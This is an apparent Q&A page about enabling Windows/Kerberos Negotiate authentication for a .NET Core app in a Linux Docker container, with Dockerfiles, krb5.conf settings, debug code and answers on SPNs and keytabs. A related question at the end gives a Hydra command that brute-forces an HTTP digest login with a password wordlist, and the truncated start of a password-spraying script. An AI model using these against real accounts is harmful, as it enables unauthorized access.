Windows authentication in a Linux Docker container - Kerberos

I am trying to use Windows authentication in a Linux Docker container under Kubernetes.
I am following this settings: https://learn.microsoft.com/en-us/aspnet/core/security/authentication/windowsauth?view=aspnetcore-3.1&tabs=visual-studio#kestrel
The app is in .NET Core 3, uses the NuGet package Microsoft.AspNetCore.Authentication.Negotiate, and runs on Kestrel.
I have added the
services.AddAuthentication(Microsoft.AspNetCore.Authentication.Negotiate.NegotiateDefaults.AuthenticationScheme).AddNegotiate();
as well as
app.UseAuthentication();
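For completeness, a minimal Startup sketch (assuming the default ASP.NET Core 3.1 webapi template; everything except the two lines above is the template default) showing where these calls sit - UseAuthentication must run before UseAuthorization:
using Microsoft.AspNetCore.Authentication.Negotiate;
using Microsoft.AspNetCore.Builder;
using Microsoft.Extensions.DependencyInjection;

public class Startup
{
    public void ConfigureServices(IServiceCollection services)
    {
        services.AddAuthentication(NegotiateDefaults.AuthenticationScheme)
                .AddNegotiate();
        services.AddAuthorization();
        services.AddControllers();
    }

    public void Configure(IApplicationBuilder app)
    {
        app.UseRouting();
        app.UseAuthentication();   // must come before UseAuthorization
        app.UseAuthorization();
        app.UseEndpoints(endpoints => endpoints.MapControllers());
    }
}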
My dev base image is set up as follows:
FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
ADD ca/ca.crt /usr/local/share/ca-certificates/ca.crt
RUN chmod 644 /usr/local/share/ca-certificates/*
RUN update-ca-certificates
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
COPY krb5.conf /etc/krb5.conf
RUN mkdir /app
RUN echo BQIAAA..== | base64 -d > /app/is.k01.HTTP.keytab
WORKDIR /app
#RUN docker version
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN apt install -y mc sudo syslog-ng realmd gss-ntlmssp
The build in the TFS pipeline creates the app Docker image derived from the one above, adds the following environment variables, and copies the build output to /app:
RUN chmod 0700 run.sh
ENV KRB5_KTNAME=/app/is.k01.HTTP.keytab
ENV KRB5_TRACE=/dev/stdout
ENV ASPNETCORE_URLS=http://*:80;https://+:443
RUN chown app:app /app -R
USER app
The app is started by run.sh:
service syslog-ng start
kinit HTTP/is.k01.mydomain.com@MYDOMAIN.COM -k -t /app/is.k01.HTTP.keytab
klist
dotnet dev-certs https
dotnet /app/SampleApi.dll
klist lists the principal which has the SPN assigned to the machine.
In IE and Firefox I have added my app to the trusted URIs (network.negotiate-auth.trusted-uris).
However, I am getting the login dialog and cannot log in successfully.
So the question is:
How can I enable debug log with Microsoft.AspNetCore.Authentication.Negotiate package?
My assumption is that this package does not communicate with Kerberos properly; perhaps some package is missing or not running.
Also note that the container and the .NET app are successfully connected to the domain, because I use integrated security for the database connection and that works.
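For illustration (server and database names are placeholders), the working database connection uses integrated security rather than a SQL login, e.g. with System.Data.SqlClient, so it authenticates with the Kerberos ticket obtained by kinit:
using System.Data.SqlClient;

var connectionString = "Server=sqlserver.mydomain.com;Database=SampleDb;Integrated Security=true;";
using (var connection = new SqlConnection(connectionString))
{
    connection.Open(); // no username/password in the connection string; the Kerberos ticket is used
}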
**** Edit > Answer to first part
To enable logs, one should enable logs in kestrel:
in appsettings.json:
"Logging": {
"LogLevel": {
"Default": "Debug",
}
},
In program.cs:
Host.CreateDefaultBuilder(args)
.ConfigureLogging(logging =>
{
logging.AddFilter("Microsoft", LogLevel.Debug);
logging.AddFilter("System", LogLevel.Debug);
logging.ClearProviders();
logging.AddConsole();
})
.ConfigureWebHostDefaults(webBuilder =>
{
    webBuilder.UseStartup<Startup>();
});
In Startup.cs one can track the negotiate events:
services.AddAuthentication(NegotiateDefaults.AuthenticationScheme).AddNegotiate(
    options =>
    {
        options.PersistKerberosCredentials = true;
        options.Events = new NegotiateEvents()
        {
            OnAuthenticated = challenge =>
            {
                ..
            },
            OnChallenge = challenge =>
            {
                ..
            },
            OnAuthenticationFailed = context =>
            {
                // context.SkipHandler();
                Console.WriteLine($"{DateTimeOffset.Now.ToString(czechCulture)} OnAuthenticationFailed/Scheme: {context.Scheme.Str()}, Request: {context.Request.Str()}");
                Console.WriteLine("context?.HttpContext?.Features?.Select(f=>f.Key.Name.ToString())");
                var items = context?.HttpContext?.Features?.Select(f => "- " + f.Key?.Name?.ToString());
                if (items != null)
                {
                    Console.WriteLine(string.Join("\n", items));
                }
                Console.WriteLine("context.HttpContext.Features.Get<IConnectionItemsFeature>()?.Items " + context.HttpContext.Features.Get<IConnectionItemsFeature>()?.Items?.Count);
                var items2 = context.HttpContext?.Features.Get<IConnectionItemsFeature>()?.Items?.Select(f => "- " + f.Key?.ToString() + "=" + f.Value?.ToString());
                if (items2 != null)
                {
                    Console.WriteLine(string.Join("\n", items2));
                }
                return Task.CompletedTask;
            }
        };
    }
);
**** Edit
Meanwhile, in line with my goal of enabling Windows authentication in a .NET Core Docker web app, I went through the source code of .NET Core and corefx and truncated the auth code down to this sample console app:
try
{
var token = "MyToken==";
var secAssembly = typeof(AuthenticationException).Assembly;
Console.WriteLine("var ntAuthType = secAssembly.GetType(System.Net.NTAuthentication, throwOnError: true);");
var ntAuthType = secAssembly.GetType("System.Net.NTAuthentication", throwOnError: true);
Console.WriteLine("var _constructor = ntAuthType.GetConstructors(BindingFlags.NonPublic | BindingFlags.Instance).First();");
var _constructor = ntAuthType.GetConstructors(BindingFlags.NonPublic | BindingFlags.Instance).First();
Console.WriteLine("var credential = CredentialCache.DefaultCredentials;");
var credential = CredentialCache.DefaultCredentials;
Console.WriteLine("var _instance = _constructor.Invoke(new object[] { true, Negotiate, credential, null, 0, null });");
var _instance = _constructor.Invoke(new object[] { true, "Negotiate", credential, null, 0, null });
var negoStreamPalType = secAssembly.GetType("System.Net.Security.NegotiateStreamPal", throwOnError: true);
var _getException = negoStreamPalType.GetMethods(BindingFlags.NonPublic | BindingFlags.Static).Where(info => info.Name.Equals("CreateExceptionFromError")).Single();
Console.WriteLine("var _getOutgoingBlob = ntAuthType.GetMethods(BindingFlags.NonPublic | BindingFlags.Instance).Where(info => info.Name.Equals(GetOutgoingBlob) && info.GetParameters().Count() == 3).Single();");
var _getOutgoingBlob = ntAuthType.GetMethods(BindingFlags.NonPublic | BindingFlags.Instance).Where(info => info.Name.Equals("GetOutgoingBlob") && info.GetParameters().Count() == 3).Single();
Console.WriteLine("var decodedIncomingBlob = Convert.FromBase64String(token);;");
var decodedIncomingBlob = Convert.FromBase64String(token);
Console.WriteLine("var parameters = new object[] { decodedIncomingBlob, false, null };");
var parameters = new object[] { decodedIncomingBlob, false, null };
Console.WriteLine("var blob = (byte[])_getOutgoingBlob.Invoke(_instance, parameters);");
var blob = (byte[])_getOutgoingBlob.Invoke(_instance, parameters);
if (blob != null)
{
Console.WriteLine("var out1 = Convert.ToBase64String(blob);");
var out1 = Convert.ToBase64String(blob);
Console.WriteLine(out1);
}
else
{
Console.WriteLine("null blob value returned");
var securityStatusType = secAssembly.GetType("System.Net.SecurityStatusPal", throwOnError: true);
var _statusException = securityStatusType.GetField("Exception");
var securityStatus = parameters[2];
var error = (Exception)(_statusException.GetValue(securityStatus) ?? _getException.Invoke(null, new[] { securityStatus }));
Console.WriteLine("Error:");
Console.WriteLine(error);
Console.WriteLine("securityStatus:");
Console.WriteLine(securityStatus.ToString());
}
}
catch(Exception exc)
{
Console.WriteLine(exc.Message);
}
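(The fragment above is not a complete program; it assumes roughly these usings and sits inside the Main method of a console app:)
using System;
using System.Linq;
using System.Net;
using System.Reflection;
using System.Security.Authentication;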
So I found out that the library communicates with
System.Net.NTAuthentication
which communicates with
System.Net.Security.NegotiateStreamPal
which communicates with the Unix version of
Interop.NetSecurityNative.InitSecContext
which should in turn trigger the GSSAPI in the OS.
In the dotnet runtime GitHub issues they tell us that gss-ntlmssp is required for this to work, even though it is not mentioned anywhere in the ASP.NET Core documentation.
https://github.com/dotnet/runtime/issues?utf8=%E2%9C%93&q=gss-ntlmssp
Nevertheless, I have compiled gss-ntlmssp and found out that without this library it throws the error "An unsupported mechanism was requested." With my library it throws the error "No credentials were supplied, or the credentials were unavailable or inaccessible.", but it never reaches any of the gss_* methods.
I have tested the usage of the gss methods by adding a log entry written to a file, which never appeared, e.g.:
OM_uint32 gss_init_sec_context(OM_uint32 *minor_status,
gss_cred_id_t claimant_cred_handle,
gss_ctx_id_t *context_handle,
gss_name_t target_name,
gss_OID mech_type,
OM_uint32 req_flags,
OM_uint32 time_req,
gss_channel_bindings_t input_chan_bindings,
gss_buffer_t input_token,
gss_OID *actual_mech_type,
gss_buffer_t output_token,
OM_uint32 *ret_flags,
OM_uint32 *time_rec)
{
FILE *fp;
fp = fopen("/tmp/gss-debug.log", "w+");
fprintf(fp, "gss_init_sec_context\n");
fclose(fp);
return gssntlm_init_sec_context(minor_status,
claimant_cred_handle,
context_handle,
target_name,
mech_type,
req_flags,
time_req,
input_chan_bindings,
input_token,
actual_mech_type,
output_token,
ret_flags,
time_rec);
}
So .NET calls GSSAPI, and GSSAPI does not call the mechanism.
I have observed the same behavior in a CentOS 7 VM, in the Ubuntu Windows Subsystem for Linux, and in a Debian Docker image (customized mcr.microsoft.com/dotnet/core/sdk:3.1-buster).
So the question now is: how can I debug GSSAPI?
I assume my current GSSAPI is provided by this library:
readelf -d /usr/lib64/libgssapi_krb5.so
Dynamic section at offset 0x4aa48 contains 34 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libkrb5.so.3]
0x0000000000000001 (NEEDED) Shared library: [libk5crypto.so.3]
0x0000000000000001 (NEEDED) Shared library: [libcom_err.so.2]
0x0000000000000001 (NEEDED) Shared library: [libkrb5support.so.0]
0x0000000000000001 (NEEDED) Shared library: [libdl.so.2]
0x0000000000000001 (NEEDED) Shared library: [libkeyutils.so.1]
0x0000000000000001 (NEEDED) Shared library: [libresolv.so.2]
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x000000000000000e (SONAME) Library soname: [libgssapi_krb5.so.2]
0x000000000000000c (INIT) 0xb1d8
0x000000000000000d (FINI) 0x3ebcc
0x0000000000000019 (INIT_ARRAY) 0x24a120
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x24a128
0x000000000000001c (FINI_ARRAYSZ) 16 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x1f0
0x0000000000000005 (STRTAB) 0x3048
0x0000000000000006 (SYMTAB) 0x720
0x000000000000000a (STRSZ) 9167 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000003 (PLTGOT) 0x24b000
0x0000000000000002 (PLTRELSZ) 8088 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0x9240
0x0000000000000007 (RELA) 0x58b0
0x0000000000000008 (RELASZ) 14736 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000006ffffffc (VERDEF) 0x5788
0x000000006ffffffd (VERDEFNUM) 3
0x000000006ffffffe (VERNEED) 0x57e0
0x000000006fffffff (VERNEEDNUM) 4
0x000000006ffffff0 (VERSYM) 0x5418
0x000000006ffffff9 (RELACOUNT) 504
0x0000000000000000 (NULL) 0x0
So far I have compiled the latest GSSAPI from the MIT sources and found out that it throws the error "An unsupported mechanism was requested." because GSSAPI requires a GSS mechanism which is not provided. In CentOS 7 I had another issue: the OpenSSL library was using a shared Kerberos library which was incompatible, so yum stopped working.
*** edit
I have found out that gss-ntlmssp has the flag GSS_C_MA_NOT_DFLT_MECH set, and thus it was failing with the message "No credentials were supplied, or the credentials were unavailable or inaccessible.". The solution is to build a custom gss-ntlmssp without this attribute, because I want to use it as the default auth mechanism.
My sample console app that checks credentials works now; I will try to make it work in the Docker container next.
*** edit
I was able to run my ConsoleApp successfully in Kubernetes:
FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
ADD ca/ca.crt /usr/local/share/ca-certificates/ca.crt
RUN chmod 644 /usr/local/share/ca-certificates/*
RUN update-ca-certificates
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
RUN mkdir /app
RUN apt install -y mc sudo syslog-ng python3-software-properties software-properties-common packagekit git gssproxy vim
RUN apt install -y autoconf automake libxslt-dev doxygen findutils libgettextpo-dev libtool m4 make libunistring-dev libssl-dev zlib1g-dev gettext xsltproc libxml2-utils libxml2-dev xml-core docbook-xml docbook-xsl bison libkrb5-dev
RUN systemctl enable syslog-ng
RUN mkdir /src
RUN cd /src && wget https://web.mit.edu/kerberos/dist/krb5/1.18/krb5-1.18.tar.gz
RUN cd /src && tar -xf krb5-1.18.tar.gz
RUN cd /src/krb5-1.18/src && ./configure && make && make install
RUN cd /src && git clone https://github.com/scholtz/gss-ntlmssp.git
RUN cd /src/gss-ntlmssp/ && autoreconf -f -i && ./configure && make && make install
RUN cp /src/gss-ntlmssp/examples/mech.ntlmssp.conf /etc/gss/mech.d/mech.ntlmssp.conf
COPY testgss /testgss
RUN cd /testgss && dotnet ConsoleApp3.dll
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN echo BQIA..AAAB | base64 -d > /app/user.keytab
RUN echo BQIA..oQ== | base64 -d > /etc/krb5.keytab
RUN echo BQIA..oQ== | base64 -d > /app/is.k01.HTTP.keytab
RUN echo BQIA..AAA= | base64 -d > /app/is.k01.kerb.keytab
COPY krb5.conf /etc/krb5.conf
COPY krb5.conf /usr/local/etc/krb5.conf
RUN ln -s /etc/gss /usr/local/etc/gss
RUN cd /app
WORKDIR /app
However, I am getting this error now:
System.Exception: An authentication exception occured (0xD0000/0x4E540016).
---> Interop+NetSecurityNative+GssApiException: GSSAPI operation failed with error - Unspecified GSS failure. Minor code may provide more information (Feature not available).
at System.Net.Security.NegotiateStreamPal.GssAcceptSecurityContext(SafeGssContextHandle& context, Byte[] buffer, Byte[]& outputBuffer, UInt32& outFlags)
at System.Net.Security.NegotiateStreamPal.AcceptSecurityContext(SafeFreeCredentials credentialsHandle, SafeDeleteContext& securityContext, ContextFlagsPal requestedContextFlags, Byte[] incomingBlob, ChannelBinding channelBinding, Byte[]& resultBlob, ContextFlagsPal& contextFlags)
*** edit
Now it fails here:
gssntlm_init_sec_context..
gssntlm_acquire_cred..
gssntlm_acquire_cred_from..
if (cred_store != GSS_C_NO_CRED_STORE) {
    retmin = get_creds_from_store(name, cred, cred_store);
} else {
    retmin = get_user_file_creds(name, cred);
    if (retmin) {
        retmin = external_get_creds(name, cred);
    }
}
get_user_file_creds() returns an error, as I do not have a specific credentials file set up, because I want to verify users against AD.
external_get_creds() fails here:
wbc_status = wbcCredentialCache(&params, &result, NULL);
if(!WBC_ERROR_IS_OK(wbc_status)) goto done;
external_get_creds tries to authenticate with the winbind library, and obviously there is no user present in the credential cache.
I managed to compile it with the winbind library that Samba provides.
So the question now is:
How do I set up the winbind library to communicate with AD?
*** Edit
I have tried to use .NET 5, as on GitHub I was told that NTLM works in .NET 5. However, I get the same result as with .NET Core 3.1.
The Docker image with which I have tried that:
FROM mcr.microsoft.com/dotnet/core-nightly/sdk:5.0-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
RUN mkdir /app
RUN apt install -y mc sudo syslog-ng python3-software-properties software-properties-common packagekit git gssproxy vim apt-utils
RUN apt install -y autoconf automake libxslt-dev doxygen findutils libgettextpo-dev libtool m4 make libunistring-dev libssl-dev zlib1g-dev gettext xsltproc libxml2-utils libxml2-dev xml-core docbook-xml docbook-xsl bison libkrb5-dev
RUN systemctl enable syslog-ng
RUN mkdir /src
#RUN cd /src && git clone https://github.com/scholtz/gss-ntlmssp.git
RUN DEBIAN_FRONTEND=noninteractive apt install -y libwbclient-dev samba samba-dev
#RUN cat /usr/include/samba-4.0/wbclient.h
COPY gss-ntlmssp /usr/local/src/gss-ntlmssp
RUN cd /usr/local/src/gss-ntlmssp/ && autoreconf -f -i && ./configure && make && make install
RUN cp /usr/local/src/gss-ntlmssp/examples/mech.ntlmssp.conf /etc/gss/mech.d/mech.ntlmssp.conf
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN echo BQIAAABMA..ArHdoQ== | base64 -d > /etc/krb5.keytab
COPY krb5.conf /etc/krb5.conf
COPY smb.conf /etc/samba/smb.conf
COPY krb5.conf /usr/local/etc/krb5.conf
RUN DEBIAN_FRONTEND=noninteractive apt install -y winbind
ENV KRB5_TRACE=/dev/stdout
RUN mkdir /src2
WORKDIR /src2
RUN dotnet --list-runtimes
RUN dotnet new webapi --auth Windows
RUN dotnet add package Microsoft.AspNetCore.Authentication.Negotiate
RUN sed -i '/services.AddControllers/i services.AddAuthentication(Microsoft.AspNetCore.Authentication.Negotiate.NegotiateDefaults.AuthenticationScheme).AddNegotiate();' Startup.cs
RUN sed -i '/app.UseAuthorization/i app.UseAuthentication();' Startup.cs
run echo a
RUN cat Startup.cs
RUN dotnet restore
RUN dotnet build
ENV ASPNETCORE_URLS="http://*:5002;https://*:5003"
EXPOSE 5002
EXPOSE 5003
RUN cd /app
WORKDIR /app
docker run -it -p 5003:5003 -it registry.k01.mydomain.com/k01-devbase:latest
In the Docker container:
kinit HTTP/myuser@MYDOMAIN.COM -k -t /etc/krb5.keytab
klist
dotnet run src2.dll
I have put my own debug output into the gssntlmssp library, writing it to a file:
cat /tmp/gss-debug.log
This is exactly the same dead end I reached with .NET Core 3.1.
wbcCredentialCache (Samba library) fails at the point where it cannot find cached credentials.
This is my krb5.conf:
[appdefaults]
    default_lifetime = 25hrs
    krb4_convert = false
    krb4_convert_524 = false
    ksu = {
        forwardable = false
    }
    pam = {
        minimum_uid = 100
        forwardable = true
    }
    pam-afs-session = {
        minimum_uid = 100
    }
[libdefaults]
    default_realm = MYDOMAIN.COM
[realms]
    MYDOMAIN.COM = {
        kdc = DC01.MYDOMAIN.COM
        default_domain = MYDOMAIN.COM
    }
[domain_realm]
    mydomain.com. = MYDOMAIN.COM
    .mydomain.com. = MYDOMAIN.COM
[logging]
    default = CONSOLE
    default = SYSLOG:INFO
    default = FILE:/var/log/krb5-default.log
    kdc = CONSOLE
    kdc = SYSLOG:INFO:DAEMON
    kdc = FILE:/var/log/krb5-kdc.log
    admin_server = SYSLOG:INFO
    admin_server = DEVICE=/dev/tty04
    admin_server = FILE:/var/log/krb5-kadmin.log
and part of the Samba config file:
[global]
    security = domain
    workgroup = mydomain.com
    password server = *
    idmap config * : range = 16777216-33554431
    template shell = /bin/bash
    winbind use default domain = yes
    winbind offline logon = false
    wins server = 10.0.0.2
In my opinion I would prefer NTLM over Negotiate, because Negotiate is not well supported among browsers as far as I know. For example, in Firefox the user must set up the Negotiate server in about:config, wildcards are not supported, etc.
Nevertheless, it seems that I will not be able to run a .NET 5 web app with NTLM, so I will now attempt to set it up without the gssntlmssp library, using the default Kerberos mechanism. Any idea what is wrong with my krb5.conf settings?
**** Edit
So I am now trying two different approaches:
NTLM - in my opinion this is the preferable way, as I have seen NTLM authenticate users without the dialog box, for example in IIS Express, and it does not require any special configuration in Firefox or through group policy (please correct me if I am wrong)
Negotiate
With regard to Negotiate I have managed to make some progress.
With this Docker container I was able to get around the unsupported mechanism error:
FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
RUN mkdir /app
RUN apt install -y mc sudo syslog-ng python3-software-properties software-properties-common packagekit git gssproxy vim apt-utils
RUN apt install -y autoconf automake libxslt-dev doxygen findutils libgettextpo-dev libtool m4 make libunistring-dev libssl-dev zlib1g-dev gettext xsltproc libxml2-utils libxml2-dev xml-core docbook-xml docbook-xsl bison libkrb5-dev
RUN systemctl enable syslog-ng
RUN mkdir /src
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN echo BQIAAAA8..vI | base64 -d > /etc/krb5.keytab
COPY krb5.conf /etc/krb5.conf
COPY krb5.conf /usr/local/etc/krb5.conf
ADD ca/is.k01.mydomain.com.p12 /etc/ssl/certs/is.k01.mydomain.com.pfx
RUN cd /app
WORKDIR /app
However, now I have another issue:
Request ticket server HTTP/is.k01.mydomain.com@MYDOMAIN.com kvno 3 found in keytab but not with enctype rc4-hmac
This tells me that the keytab does not contain an rc4-hmac key, which is true, because the keytab was generated with
ktpass -princ HTTP/is.k01.mydomain.com@MYDOMAIN.COM -pass ***** -mapuser MYDOMAIN\is.k01.kerb -pType KRB5_NT_PRINCIPAL -out c:\temp\is.k01.HTTP.keytab -crypto AES256-SHA1
as the .NET documentation says.
I was not able to disallow the use of rc4-hmac and allow only newer encryption types, so I asked my infrastructure department to generate a new keytab with the old rc4-hmac encryption.
This step moved me further, and I get this error instead: Request ticket server HTTP/is.k01.mydomain.com@MYDOMAIN.COM kvno 4 not found in keytab; keytab is likely out of date
Which is very weird, because keytabs cannot get out of date: the password has not been changed and was 100% valid one hour ago when the keytab was generated, and there is hardly any information on the web - "kvno 4 not found in keytab" returns only 4 results on Google.
**** EDIT
So finally I have managed to make it work :)
The issue with "kvno 4 not found in keytab" was in the krb5.conf file, where, in order to force AES encryption, I had added these lines:
# default_tkt_enctypes = aes256-cts-hmac-sha1-96 aes256-cts-hmac-sha1-9
# default_tgs_enctypes = aes256-cts-hmac-sha1-96 aes256-cts-hmac-sha1-9
# permitted_enctypes = aes256-cts-hmac-sha1-96 aes256-cts-hmac-sha1-9
After I commented them out, authentication using Negotiate started to work. I have tested NTLM with .NET 5 and it still does not work.
The krb5.conf file with which Negotiate works in the Docker container built above:
[appdefaults]
    default_lifetime = 25hrs
    krb4_convert = false
    krb4_convert_524 = false
    ksu = {
        forwardable = false
    }
    pam = {
        minimum_uid = 100
        forwardable = true
    }
    pam-afs-session = {
        minimum_uid = 100
    }
[libdefaults]
    default_realm = MYDOMAIN.COM
[realms]
    MYDOMAIN.COM = {
        kdc = DC02.MYDOMAIN.COM
        default_domain = MYDOMAIN.COM
    }
[domain_realm]
    mydomain.com. = MYDOMAIN.COM
    .mydomain.com. = MYDOMAIN.COM
[logging]
    default = CONSOLE
    default = SYSLOG:INFO
    default = FILE:/var/log/krb5-default.log
    kdc = CONSOLE
    kdc = SYSLOG:INFO:DAEMON
    kdc = FILE:/var/log/krb5-kdc.log
    admin_server = SYSLOG:INFO
    admin_server = DEVICE=/dev/tty04
    admin_server = FILE:/var/log/krb5-kadmin.log
So the question now: is there any way to allow many services to use the Negotiate protocol without adding SPNs one by one and manually configuring the browsers?
So at the moment every new web service must have:
setspn -S HTTP/mywebservice.mydomain.com mymachine
setspn -S HTTP/mywebservice@MYDOMAIN.COM mymachine
and must be allowed in Internet Explorer > Settings > Security > Sites > Details (the domain should be listed there);
in Firefox in about:config > network.negotiate-auth.trusted-uris;
Chrome, as far as I know, takes the Internet Explorer settings.
I assume that the Internet Explorer settings can somehow be updated by domain group policy - does anybody have any idea how?
**** EDIT
I have tested wildcards in the domain for the Negotiate settings in browsers, and these are the results:
chrome: SUPPORTS *.k01.mydomain.com
ie: SUPPORTS *.k01.mydomain.com
firefox (73.0.1 (64-bit)): DOES NOT SUPPORT *.k01.mydomain.com - only the full domain, e.g. is.k01.mydomain.com
edge 44.18362.449.0: I don't know why, but none of the IE settings were propagated; it works neither with *.k01.mydomain.com nor with is.k01.mydomain.com
**** EDIT
I have started to use Windows auth with Negotiate; however, I now get some issues in .NET Core.
This code under IIS Express shows the user in the form MYDOMAIN\myuser:
var userId = string.Join(',', User?.Identities?.Select(c => c.Name)) ?? "?";
In Linux it shows as myuser@mydomain.com
User.Identities.First() under IIS Express is a WindowsIdentity and I can list all groups of the user.
User.Identities.First() under Linux is a ClaimsIdentity with no group information.
When I try to restrict access to a group, in IIS Express I get:
//Access granted
[Authorize(Roles = "MYDOMAIN\\GROUP1")]
//403
[Authorize(Roles = "MYDOMAIN\\GROUP_NOT_EXISTS")]
Linux kestrel with negotiate:
//403
[Authorize(Roles = "MYDOMAIN\\GROUP1")]
So it seems that Negotiate in Kestrel does not list groups properly. I am now going to investigate how to get a WindowsIdentity in Kestrel.
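For illustration, one possible workaround is to add role claims yourself with an IClaimsTransformation. This is only a sketch with a hard-coded lookup (the user and group names are placeholders); a real implementation would have to resolve the groups from AD, for example over LDAP:
using System.Collections.Generic;
using System.Security.Claims;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Authentication;

public class AdGroupClaimsTransformation : IClaimsTransformation
{
    // Placeholder lookup - a real implementation would resolve groups from AD (e.g. via LDAP).
    private static readonly Dictionary<string, string[]> GroupMap =
        new Dictionary<string, string[]>
        {
            ["myuser@mydomain.com"] = new[] { @"MYDOMAIN\GROUP1" }
        };

    public Task<ClaimsPrincipal> TransformAsync(ClaimsPrincipal principal)
    {
        if (principal.Identity is ClaimsIdentity identity &&
            identity.Name != null &&
            GroupMap.TryGetValue(identity.Name, out var groups))
        {
            foreach (var group in groups)
            {
                if (!identity.HasClaim(ClaimTypes.Role, group))
                {
                    identity.AddClaim(new Claim(ClaimTypes.Role, group));
                }
            }
        }
        return Task.FromResult(principal);
    }
}

// Registered in ConfigureServices:
// services.AddSingleton<IClaimsTransformation, AdGroupClaimsTransformation>();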

This article is a good example of misunderstanding how things work. I don't recommend following the way the author described here (like I did) at all.
Instead, I would recommend learning about Kerberos authentication, how it works and what settings it requires. This article visualizes it well.
First,
If you profile the HTTP traffic coming from the browser (use Fiddler, for example) you can find a TGS token in the second request.
If it starts with Negotiate TlR then you're doing auth over NTLM.
If it starts with Negotiate YII then you're doing auth over Kerberos.
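For illustration, the prefix check works because NTLM messages begin with the ASCII signature "NTLMSSP" followed by a zero byte, whose base64 encoding starts with "TlR", while SPNEGO/Kerberos tokens are ASN.1 encoded and their base64 form starts with "YII". A small helper along these lines (a sketch; the token is whatever follows "Negotiate " in the Authorization header) can classify it:
using System;
using System.Text;

static bool IsNtlmToken(string negotiateToken)
{
    // NTLM messages start with the ASCII signature "NTLMSSP\0";
    // SPNEGO/Kerberos tokens are ASN.1 DER and their base64 form starts with "YII".
    byte[] bytes = Convert.FromBase64String(negotiateToken);
    return bytes.Length >= 8 &&
           Encoding.ASCII.GetString(bytes, 0, 7) == "NTLMSSP" &&
           bytes[7] == 0;
}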
Second,
Like David said before, ASP.NET Core 3.1 doesn't support NTLM on Linux at all. So if you have a TlR token and the ntlm-gssapi mechanism, you will get the "No credentials were supplied, or the credentials were unavailable or inaccessible." error.
If you have a TlR token and use the default Kerberos mechanism, you will get "An unsupported mechanism was requested."
Next,
The only way to get your app to work well is to create the SPNs and generate the keytab correctly for Kerberos authentication. Unfortunately, this is not documented well, so I am going to give an example here to make things clearer.
Let's say you have:
AD domain MYDOMAIN.COM
A web application with host webapp.webservicedomain.com. This can end with mydomain.com, but does not in my case.
A Windows machine joined to AD with the name mymachine.
Machine account MYDOMAIN\mymachine
Following the instructions described here, you need to:
Add new web service SPNs to the machine account:
setspn -S HTTP/webapp.webservicedomain.com mymachine
setspn -S HTTP/webapp@MYDOMAIN.COM mymachine
Use ktpass to generate a keytab file
ktpass -princ HTTP/webapp.webservicedomain.com@MYDOMAIN.COM -pass myKeyTabFilePassword -mapuser MYDOMAIN\mymachine$ -pType KRB5_NT_PRINCIPAL -out c:\temp\mymachine.HTTP.keytab -crypto AES256-SHA1*.
*Make sure MYDOMAIN\mymachine has AES256-SHA1 allowed in AD.
Finally,
After all of the above is done and the app is deployed into a Linux container with the keytab, Integrated Windows Authentication is supposed to work well. My experiment showed you can use the keytab wherever you want, not only on the host with the name "mymachine".

In the dotnet runtime GitHub issues they tell us that gss-ntlmssp is required for this to work, even though it is not mentioned anywhere in the ASP.NET Core documentation.
The 'gss-ntlmssp' package is a plug-in for supporting the NTLM protocol for the GSS-API. It supports both raw NTLM protocol as well as NTLM being used as the fallback from Kerberos to NTLM when 'Negotiate' (SPNEGO protocol) is being used. Ref: https://learn.microsoft.com/en-us/openspecs/windows_protocols/MS-SPNG/f377a379-c24f-4a0f-a3eb-0d835389e28a
From reading the discussion above and the image you posted, it appears that the application is trying to actually use NTLM instead of Kerberos. You can tell because the base64 encoded token starts with "T" instead of "Y".
ASP.NET Core server (Kestrel) does NOT support NTLM server-side on Linux at all. It only provides for 'Www-Authenticate: Negotiate' to be sent back to clients. And usually that means that Kerberos would be used. Negotiate can fall back to using NTLM. However, that doesn't work in ASP.NET Core except in .NET 5 which has not shipped yet.
Are you expecting your application to fall back to NTLM? If not, then perhaps the Kerberos environment is not completely set up. This can be caused by a variety of issues including the SPNs and Linux keytab files not being correct. It can also be caused by the client trying to use a username/password that is not part of the Kerberos realm.
This problem is being discussed here: https://github.com/dotnet/aspnetcore/issues/19397
I recommend the conversation continue in the aspnet core repo issue discussion.

Related

Brute forcing http digest with Hydra

I am having some trouble brute forcing an HTTP digest form with Hydra. I am using the following command; however, when the traffic is proxied through Burp Suite I can see that Hydra is using basic auth and not digest.
How do I get Hydra to use the proper auth type?
Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -vV http-get /digest
Request as seen in proxy:
GET /digest HTTP/1.1
Host: 127.0.0.1
Connection: close
Authorization: Basic YWRtaW46aWxvdmV5b3U=
User-Agent: Mozilla/4.0 (Hydra)
I have studied this case: if the digest method is implemented at the web server level (Nginx or Apache), Hydra might work. But if the authentication is implemented in the application server, like Flask, Express.js or Django, it will not work at all.
You can create a bash script for password spraying:
#!/bin/bash
# Usage: ./app.sh users.txt passwords.txt http://example.com/path
while read -r USER; do
  while read -r PASSWORD; do
